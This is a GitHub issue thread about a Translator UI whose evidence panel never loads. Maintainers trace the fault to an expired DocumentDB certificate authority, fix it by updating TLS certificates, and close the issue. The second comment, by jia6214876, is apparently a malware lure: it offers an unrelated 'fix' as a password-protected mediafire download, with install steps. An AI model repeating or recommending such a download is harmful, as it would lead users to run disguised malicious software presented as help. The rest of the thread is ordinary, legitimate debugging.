### ISSUE TITLE
Evidence won't load for edges in UI

### ISSUE THREAD

**Issue by amykglen** [NCATSTranslator/Feedback#923] opened 2024-08-27 01:03 UTC
I ran the query "What drugs may treat conditions related to Adams-oliver Syndrome?" on `ui.test.transltr.io`, and after all results came in ([here](https://ui.test.transltr.io/results?l=Adams-oliver%20Syndrome&i=MONDO:0007034&t=0&r=0&q=cc818ef5-ff34-45ad-bee6-0079c6f2df52)), when I click on an edge in any result to view evidence, I see a perpetual spinner saying "Retrieving Evidence", which never seems to load (I've waited a few minutes and my internet connection is fine):

<img width="1246" alt="Screenshot 2024-08-26 at 5 49 39 PM" src="https://github.com/user-attachments/assets/fd89fd15-ba26-46d3-90e2-7bb9ef714a0a">

it looks like CORS (and maybe other?) errors are being thrown behind the scenes:

<img width="1506" alt="Screenshot 2024-08-26 at 6 00 36 PM" src="https://github.com/user-attachments/assets/f6f3f4f1-3dbf-42c9-ae9e-a9ab301026e6">

I'm using Chrome Version 127.0.6533.120 (Official Build) (arm64)

**Comment by jia6214876** [comment] 2024-08-27 01:04
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sstemann** [comment] 2024-08-28 15:08
i believe this is an environmental issue - @dnsmith124 notified ITRB - the response was:

The issue seems to be occurring not just in prod but all the three environments.
Docmetadata uses Amazon Document DB to store data and uses rds-ca-2019 Certificate Authority which has approached end of life on Aug 27 2024

Hopefully it will be resolved today.

**Comment by dnsmith124** [comment] 2024-08-28 16:10
@sstemann I'm going to be adding a fallback to the UI in the future in case this happens again. Going forward the UI will still display evidence even if the publication metadata service is down, but it will only show the link and source (no journal, title, etc). Less than ideal but better than being stuck in a loading loop!

**Comment by dnsmith124** [comment] 2024-08-28 19:02
ITRB has resolved this issue, they posted the following in slack: 
`docmetadata should be fixed now in all the three environments...I have updated the Document DB TLS Certificates on the application and at the cluster level.`

confirmed that the fix is working in all environments.

Closing!

**Closed by dnsmith124** 2024-08-28 19:02 UTC
Labels: bug, Fugu (Sprint 4) - due July 19 in CI
